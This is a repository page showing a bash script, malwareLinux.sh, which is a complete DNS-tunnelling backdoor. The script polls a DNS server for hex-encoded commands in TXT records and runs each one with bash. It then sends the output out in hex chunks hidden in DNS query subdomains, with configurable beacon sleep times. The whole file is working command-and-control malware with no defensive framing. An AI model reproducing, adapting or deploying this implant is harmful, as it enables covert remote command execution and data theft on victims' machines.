-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmalwareLinux.sh
127 lines (116 loc) · 3.51 KB
/
malwareLinux.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#!/bin/bash
CLIENT_NAME="client1"
DEST_DOMAIN="google.com"
DNS_SERVER="127.0.0.1"
DEFAULT_CMD_HEX="70617373"
COMMAND_TIMEOUT=5
SLEEP_TIME=1
LONG_SLEEP_TIME=5
EXTRA_LONG_SLEEP_TIME=10
DNS_FAILURE_SLEEP_TIME=300
sleep_counter=0
MAX_SLEEP_HIT=60
lsleep_counter=0
MAX_LSLEEP_HIT=30
string_to_hex() {
echo -n "$1" | hexdump -ve '1/1 "%.2x"'
}
execute_command() {
local cmd=$1
local output
output=$(timeout "$COMMAND_TIMEOUT" bash -c "$cmd" 2>&1)
if [ $? -eq 124 ]; then
output="Command timed out after $COMMAND_TIMEOUT seconds."
fi
string_to_hex "$output"
}
send_hex_output() {
local hex_output=$1
local dest_domain=$2
local dns_server=$3
while [ -n "$hex_output" ]; do
local chunk=${hex_output:0:58}
hex_output=${hex_output:58}
dig +noedns +nocookie @$dns_server A $chunk.$CLIENT_NAME.$dest_domain > /dev/null 2>&1
done
dig +noedns +nocookie @$dns_server A $CLIENT_NAME.$dest_domain > /dev/null 2>&1
}
get_command_from_server() {
local client_name=$1
local dest_domain=$2
local dns_server=$3
local response
response=$(dig @$dns_server TXT +noedns +nocookie +short $client_name.$dest_domain 2>/dev/null | grep -vE '^[[:space:]]*$|^;;' | tr -d '"')
if [ -z "$response" ]; then
sleep $DNS_FAILURE_SLEEP_TIME
echo "$DEFAULT_CMD_HEX"
return
fi
response=$(echo "$response" | tr -d '[:space:]' | tr -d '[:cntrl:]')
if [ -z "$response" ]; then
echo "$DEFAULT_CMD_HEX"
else
echo "$response"
fi
}
is_valid_hex() {
local hex_string=$1
[[ $hex_string =~ ^[0-9a-fA-F]+$ ]] && echo "yes" || echo "no"
}
send_confirmation() {
local message=$1
local message_hex
message_hex=$(string_to_hex "$message")
send_hex_output "$message_hex" $DEST_DOMAIN $DNS_SERVER
}
reset_sleep_settings() {
sleep_counter=0
lsleep_counter=0
}
while true; do
command_hex=$(get_command_from_server $CLIENT_NAME $DEST_DOMAIN $DNS_SERVER)
if [ "$(is_valid_hex $command_hex)" == "no" ]; then
sleep $SLEEP_TIME
continue
fi
command=$(echo "$command_hex" | xxd -r -p 2>/dev/null)
if [ $? -ne 0 ]; then
sleep $SLEEP_TIME
continue
fi
if [[ "$command" =~ ^sleep\ [0-9]+$ ]]; then
SLEEP_TIME=$(echo $command | awk '{print $2}')
reset_sleep_settings
send_confirmation "Sleep time set to $SLEEP_TIME seconds."
continue
fi
if [[ "$command" =~ ^lsleep\ [0-9]+$ ]]; then
LONG_SLEEP_TIME=$(echo $command | awk '{print $2}')
reset_sleep_settings
send_confirmation "Long sleep time set to $LONG_SLEEP_TIME seconds."
continue
fi
if [[ "$command" =~ ^llsleep\ [0-9]+$ ]]; then
EXTRA_LONG_SLEEP_TIME=$(echo $command | awk '{print $2}')
reset_sleep_settings
send_confirmation "Extra long sleep time set to $EXTRA_LONG_SLEEP_TIME seconds."
continue
fi
if [ "$command_hex" == "$DEFAULT_CMD_HEX" ]; then
if [ $sleep_counter -lt $MAX_SLEEP_HIT ]; then
sleep_counter=$((sleep_counter + 1))
sleep_time=$SLEEP_TIME
elif [ $lsleep_counter -lt $MAX_LSLEEP_HIT ]; then
lsleep_counter=$((lsleep_counter + 1))
sleep_time=$LONG_SLEEP_TIME
else
sleep_time=$EXTRA_LONG_SLEEP_TIME
fi
sleep $sleep_time
continue
fi
reset_sleep_settings
output_hex=$(execute_command "$command")
send_hex_output "$output_hex" $DEST_DOMAIN $DNS_SERVER
sleep $SLEEP_TIME
done